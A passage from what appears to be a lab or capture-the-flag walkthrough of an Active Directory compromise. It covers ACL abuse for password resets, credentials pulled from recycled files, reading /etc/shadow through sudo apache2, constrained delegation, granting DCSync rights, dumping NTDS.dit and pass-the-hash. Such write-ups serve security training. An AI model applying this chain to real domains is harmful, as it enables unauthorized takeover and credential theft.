* Since I have these permissions, I can now add GenericAll rights to the group for j.dillon, add j.dillon to the group, and then I can ForceChangePassword for l.thompson:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F9E7Fh31XKrbDm7u9havj%2Fimage.png?alt=media&amp;token=d675fa66-a548-46f6-b38d-0f5a17062e62" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FZCDdeIGMDSOocbXYegYt%2Fimage.png?alt=media&amp;token=5313f2f7-217c-4631-9e57-d38ac8506e10" alt=""><figcaption></figcaption></figure>

* Upon attempting to gain access, I can see that the l.thompson user account is disabled. We need to pivot. Looking back through our notes, I recall that user d.barowski has UAC permissions over l.thompson. This is what we needed:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FuQQZwUXFbgStUmNANjGM%2Fimage.png?alt=media&amp;token=a29596d8-71da-42ff-b806-e3253b634124" alt=""><figcaption></figcaption></figure>

* We will leverage this to remove that UAC. The account is no longer disabled:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FbUma1Dq0e4SqNsoi60SW%2Fimage.png?alt=media&amp;token=c5116dce-0dce-4cc9-b5a0-3b72ab9ee784" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FEj3LyVq3YybbOtvxE4rQ%2Fimage.png?alt=media&amp;token=c2dd824a-7847-4a4e-b2b4-e24d94a6f0bc" alt=""><figcaption></figcaption></figure>

## Enumeration as User 'l.thompson'

* We will continue to enumerate as this user. I began by running the following command to search for any potential files that contained the words credentials or passwords, but this did not turn anything up that was of use:

{% code expandable="true" %}

```
Get-ChildItem -Path C:\Users\l.thompson -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*credential*" -or $_.Name -like "*password*" }
```

{% endcode %}

* I then shifted and continued to enumerate. I was able to find that the ConsoleHistory file contained some interesting entries. It looks like this user had deleted some emails and Groups\_credentials.xml file:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FMpXqxMlJ267vvSZyhEl5%2Fimage.png?alt=media&amp;token=821af92f-7215-4aa8-9e87-da40d204aad8" alt=""><figcaption></figcaption></figure>

* Interesting, looking in the users $Recycle.Bin we can see that there is an email file. We are interested in the this as this can provide a lot of information. We will cat out both files:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FPUpozVNpE6cmEkZP50xg%2Fimage.png?alt=media&amp;token=680f7b46-106d-4c7d-8a26-c2ca2bc58a83" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FmlmBiELVup6aVmQYTYLo%2Fimage.png?alt=media&amp;token=e7183181-2e74-4551-9c68-15b6c28aed81" alt=""><figcaption></figcaption></figure>

* The Directory OPS group is interesting. We can see from enumerating LDAP that cliff.b is a member of this group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fm0ypDglAG2djY0m9gF6p%2Fimage.png?alt=media&amp;token=fdf77b75-2e7a-4720-87fe-e20d86996a06" alt=""><figcaption></figcaption></figure>

* I then decided to go back and further enumerate the users $Recycle.Bin and found a bigger file present. This is an xml file that was sitting in the recycle bin. Concatenating the file shows that there is a password present for what appears to be the cliff.b user:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FfTYsxkCAeQLGzY4AlaGa%2Fimage.png?alt=media&amp;token=3a1ed5ce-3634-4c41-ba14-8c40432ff8dd" alt=""><figcaption></figcaption></figure>

* We can confirm with netexec that this is the password:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FPdidjdTfL0I5hys0MErR%2Fimage.png?alt=media&amp;token=87d5ef12-dc5c-4082-8fdc-36515a9cec80" alt=""><figcaption></figcaption></figure>

* We can see that this user has WriteOwner and WriteDACL permissions over a group and users:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FlyWpezMY0NpdZ4dJAwE2%2Fimage.png?alt=media&amp;token=275967cf-cbad-4193-9131-4f5caaee4c80" alt=""><figcaption></figcaption></figure>

* After some enumeration, cliff.b is a member of the Directory Ops group. This group has FullControl over the 'Dev Ops' OU:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FvHPz46p5OvTjF1q8hb56%2Fimage.png?alt=media&amp;token=9c45bd19-af78-4dc6-aeb1-4233f7d42fb7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fg8dqGaZ6eRhkZyTv5C3W%2Fimage.png?alt=media&amp;token=6a2a67e7-399b-45a6-9270-273128228075" alt=""><figcaption></figcaption></figure>

* Since cliff.b is a member of the Remote Management Users group, we can gain access as this user remotely and continue enumerating.

## Enumeration as User 'cliff.b'

* There is an interesting email on the users desktop regarding the Senior DevOps permissions and talks about scripts that can carry out a workaround for this. There is a lot to work with here:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FsJqANwfY9EZvBPnWDrgU%2Fimage.png?alt=media&amp;token=8264df0b-b8c0-4751-9dae-9fa2288d4957" alt=""><figcaption></figcaption></figure>

* Running the following command, I can see that there is a directory where these are kept:

{% code expandable="true" %}

```
Get-ChildItem -Path C:\Users\cliff.b -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*.ps1*" }
```

{% endcode %}

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FGMbjmJArIJPDMKpUyXUd%2Fimage.png?alt=media&amp;token=fdb568ca-6150-45d1-9c5f-dabca46e8f6f" alt=""><figcaption></figcaption></figure>

* Taking a look at the scripts, the most important one to us is the Configure-OUDelegation.ps1 as this will run a scheduled task that will grant Senior Dev Ops rights to members of the Directory Ops group, which we know that cliff.b is a member of. This will allow us to elevate our permissions as the user cliff.b:

{% code overflow="wrap" expandable="true" %}

```
# Triggers a SYSTEM-level scheduled task that modifies permissions on the Senior Dev Ops OU, granting rights to members of the Directory Ops group.

$service = New-Object -ComObject "Schedule.Service"
$service.Connect()

$task = $service.GetFolder("\").GetTask("Configure-OUDelegation")
$task.Run($null)
```

{% endcode %}

* We will first run the check\_ou\_permissions.ps1:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FpQEojqiYw08ur0pC1eGJ%2Fimage.png?alt=media&amp;token=f9bc9e71-6fc6-4066-a2c2-cbef3bcc6c38" alt=""><figcaption></figcaption></figure>

* And then run the Configure-OUDelegation.ps1. Once we have run this, we will see that cliff.b now has the following permissions in the Senior Dev Ops OU, whereas prior cliff.b did not have these permissions:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FEzlY0PUv8hkpgPLKc5by%2Fimage.png?alt=media&amp;token=2d0244a5-35ce-450e-8262-b65836239d2d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FfvsJ65uOS3o8QelDfIrz%2Fimage.png?alt=media&amp;token=4eed5dd6-4db3-46c1-bea9-f50c372dbe09" alt=""><figcaption></figcaption></figure>

## More LDAP Enumeration

* Ok, we will now continue to enumerate LDAP. Since we have Write permissions on the Senior Dev Ops OU, we can see if there are any members of this group that are of interest. I am interested in gaining RDP access as the user m.mignola. This looks like a lucrative target. My though is to move the user to the Directory Ops group and then use the GenericAll permissions that cliff.b already has over that group to then ForceChangePassword for that user to subsequently gain RDP access:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F2HM2t4OnulsNP2L4mooY%2Fimage.png?alt=media&amp;token=d775736a-2a68-452e-8220-320e7d6e0876" alt=""><figcaption></figcaption></figure>

* I will now move this user to the OU that cliff.b has GenericAll permissions and change this users password:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FQxNtT2Gjj1NWgLVY5kUF%2Fimage.png?alt=media&amp;token=a5d8eb25-3fa4-43c8-8290-49b1f487835b" alt=""><figcaption></figcaption></figure>

## RDP Access as User 'm.mignola'

* Once we gain RDP access, we can enumerate and find a very interesting file:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FETvJ4ey9Lo0urOciMIxJ%2Fimage.png?alt=media&amp;token=aaefe6c2-239d-4f90-894f-08db8d0dea2d" alt=""><figcaption></figcaption></figure>

* We also find an SSH private key file on the users Desktop:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FmPgWbGYBT2i86eMa358F%2Fimage.png?alt=media&amp;token=afd697a6-a0bc-48ce-a0b7-129154312400" alt=""><figcaption></figcaption></figure>

* Within the recycle bin, there is an SSH shortcut that could possibly be used with the private key. I will restore this and test out this hypothesis:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FFZ2jyyZMpDmAjzk8pNbt%2Fimage.png?alt=media&amp;token=bc45cc96-2519-4a96-ae9b-1de74a80fb90" alt=""><figcaption></figcaption></figure>

* Upon restoration, we are able to connect via SSH locally and continue the session as user 'svc\_unix':

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F16SNMnY8BlN6Z6UgA1k5%2Fimage.png?alt=media&amp;token=117c4e34-f66f-4e6d-ba50-87d2cec53e89" alt=""><figcaption></figcaption></figure>

* I then looked at the history of the commands that were run and found the following. I concatenated out the MySQL configuration file to see the user and password that was set as this was discussed in the above note. Additionally, we can connect to the internal MySQL instance that is running:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FNkTD9qV5vuyypBF22OoN%2Fimage.png?alt=media&amp;token=3ef58d3b-bcc9-4680-8b04-d6b89ec802d7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fv9TqEUKS8nJS0UGR7vNG%2Fimage.png?alt=media&amp;token=e8cf42e1-5d52-48d2-b55d-0f7d4df80d8d" alt=""><figcaption></figcaption></figure>

* Doing a bit of enumeration, we can see that our user uses the same password that we just found. We can list out and see if this user can run anything as root, which we coe to find the user can run apache2 as root:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FoncGY22vV5s1R90dRdzU%2Fimage.png?alt=media&amp;token=beacadc7-6070-4a89-94fb-3e0f3ce189a1" alt=""><figcaption></figcaption></figure>

* Utilizing a site like <https://gtfobins.org/gtfobins/apache2/> to look for running apache2 with sudo permissions, we can see that we can read data from local files. We can search for interesting files and read them now. We can read the /etc/passwd and /etc/shadow. We can also list out the history from the root directory. Being that we can read from any file using sudo with apache2, I decided to go this route. I am able to find what appears to be a password that is present:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F32IczKrs6LgPTQxqwV4n%2Fimage.png?alt=media&amp;token=50c88777-2a04-4a50-bb84-a63fface5ff7" alt=""><figcaption></figcaption></figure>

* Okay, what do we know as of now. From the the above command in the root history, we can see that the user changed to the root user and supplied a password, amongst other actions. We know that user 'andrew\.collins' controls access to the root account. This could possibly be this users password and they are potentially reusing it. We will attempt to access the user 'andrew\.collins' with this password to the DC. We are able to gain access:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FGzeXkDgiqtshtZhHdd5r%2Fimage.png?alt=media&amp;token=4c182d6d-f221-406b-b11f-d8ef9b67a664" alt=""><figcaption></figcaption></figure>

* We can see that andrew\.collins is a member of the Support Admins group. This might be very lucrative for us and allow use to escalate our privileges:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FOgsZ8Z35Uf7TEbB8JUB0%2Fimage.png?alt=media&amp;token=8b96b420-9b5c-44cc-946e-40bdf51d6c43" alt=""><figcaption></figcaption></figure>

## Gaining Access as User 'm.brown'

* After some further enumeration, I found that that user m.brown has constrained delegation with protocol transition permissions over the DC, which will allow us to take advantage of the S4U2self and S4U2proxy. This will allow us to impersonate users on the DC and possibly escalate our privileges barring the users are not in a Protected Group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FgyupfX4ijOcrcao7ynVM%2Fimage.png?alt=media&amp;token=c995e8c1-b4bc-43a1-a482-c2ea64239537" alt=""><figcaption></figcaption></figure>

* Further enumeration on the m.brown user shows that andrew\.collilns has the following permissions over this user:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F65vsFcAYpwXREsph1Hjc%2Fimage.png?alt=media&amp;token=2db761ba-9727-4453-b8ce-a9bdf28f8f0b" alt=""><figcaption></figcaption></figure>

## Attack Path

* The attack path at this point is clear. Use ForceChangePassword rights to change the password of the user 'm.brown'. Conduct Constrained Delegation <https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained> attack against the DC and impersonate a high privileged user to then ultimately dump the NTDS.dit and PtH as the Domain Admin account. First we change the password for m.brown:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fwp1YQUZD34BKMZITNzjs%2Fimage.png?alt=media&amp;token=a679dfaa-2de5-4e69-885d-06eb95785c27" alt=""><figcaption></figcaption></figure>

* Next, we will perform Constrained Delegation. We already have these rights assigned, so we can simply request a ServiceTicket (ST) to then impersonate a higher privileged user. In this case, we can use the administrator and DC$ accounts. This fails, however with the same error message. I have a sneaking suspicion that these users are in a Protected Group or cannot be delegated to:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2F1h2fTTCnaE8BSI4LTwR7%2Fimage.png?alt=media&amp;token=d449409c-8ee2-447c-bfd6-64a740559dad" alt=""><figcaption></figcaption></figure>

* Let's see if we can confirm the above by searching LDAP. We are looking for any users that have membership in a Protected Group or that have the userAccountControl set to 'userAccountControl:1.2.840.113556.1.4.803:=1048576' signifying that they cannot be delegated to. Funny enough, we find them (HAHAHA). Let me show you my shocked face:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FzNHfET0q0bNas2Vo4ACt%2Fimage.png?alt=media&amp;token=7e54099b-ccdd-4bf3-a230-13034489a2df" alt=""><figcaption></figcaption></figure>

* We will not be defeated after making it this far. Let's see if we can enumerate anything else that will allow us to continue our attack path. Searching through the users, I can see one that I have not had much interaction with. User 'm.ibabao is a member of the Exchange Operations Group and Protected Users group. If we can remove this user from the Protected Users group, we could see what the Exchange Operations Group can offer us:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FfwaMPxi6Zqk364exPTdL%2Fimage.png?alt=media&amp;token=9eb73990-f21e-42f8-a735-0075ab54d5d5" alt=""><figcaption></figcaption></figure>

* Looking at the Protected Users group, we can see that members of the Identity\_Admins group have self-membership WriteProperty over this group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FlU68GwIflo4so9E89Kpn%2Fimage.png?alt=media&amp;token=f8d3a673-efa5-437c-96f0-9b463fb5e8f9" alt=""><figcaption></figcaption></figure>

* We see the following users are part of this Identity\_Admins group. Since we previously established rights over the Senior Dev Ops OU as user cliff.b, we can move one or both of them to the Dev Ops group and then change the password to control that user:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FfEO8StW9Yo3mrEwwnssz%2Fimage.png?alt=media&amp;token=fbeae45d-b18a-4eb9-ab05-405324e56220" alt=""><figcaption></figcaption></figure>

* Changing the users OU and password:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2Fi4FIFzlEDxHLRCEqUtgI%2Fimage.png?alt=media&amp;token=86c47ec8-b74c-41d6-8ce2-8235528da7c6" alt=""><figcaption></figcaption></figure>

* Now, we can attempt to remove the user 'm.ibabao' from Protected Users group:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FQ71A98M1bWVCfQL7T1lD%2Fimage.png?alt=media&amp;token=a03dc135-cb4d-4e75-950b-2b96c654340e" alt=""><figcaption></figcaption></figure>

* We will enumerate the Exchange Operations Group to see if this group has any rights over the DC. We can see that this group has WriteDACL on the DC:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FRsSlEUpOrn4W2GaoXssf%2Fimage.png?alt=media&amp;token=242c5bbc-fb6b-4c7a-96e7-70ceca4c2fa7" alt=""><figcaption></figcaption></figure>

## Finalized Attack Path

* Ok, since m.ibabao is a member of the Exchange Operations Group, and this group has WriteDACL on the DC, we can impersonate this user as m.brown by requesting a ST, gain access as m.ibabao, and grant ourselves DCSync privs per this article <https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/#writedacl>. First, we will start by requesting the ST:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FWbuxys7V7XHu8MI1kIYw%2Fimage.png?alt=media&amp;token=e08ee8d0-98e6-4bf5-bb28-81d9a5bdf28c" alt=""><figcaption></figcaption></figure>

* Next, we will export the ticket and then add the following DCSync permissions to m.ibabao:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FqENrIkBUvV4HY04SPHV3%2Fimage.png?alt=media&amp;token=f98cf052-829b-4211-a113-50ed6158b2d7" alt=""><figcaption></figcaption></figure>

* Finally, I will perform a DCSync and dump the NTDS.dit:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FrPBgFQkpMfn70CgobHHw%2Fimage.png?alt=media&amp;token=cfdf55d5-6e57-4e89-bb15-bcaf487acd2b" alt=""><figcaption></figcaption></figure>

* We can then Pass the Hash (PtH) for the administrator account:

<figure><img src="https://3310166020-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FK0Ny7JEeHiZzpI1LeGhC%2Fuploads%2FNdNcnioFzLIQa2rpiXRg%2Fimage.png?alt=media&amp;token=b67bd0e8-c49b-4941-99e7-87cba7d02d48" alt=""><figcaption></figcaption></figure>

## Resources

### GenericWrite - TargetedKerberoast

* <https://bloodhound.specterops.io/resources/edges/generic-write#genericwrite>

### RemotePotato0

* <https://hackmag.com/security/remotepotato0>

### WriteDACL - Leading to DCSync Permission

* <https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/#writedacl>
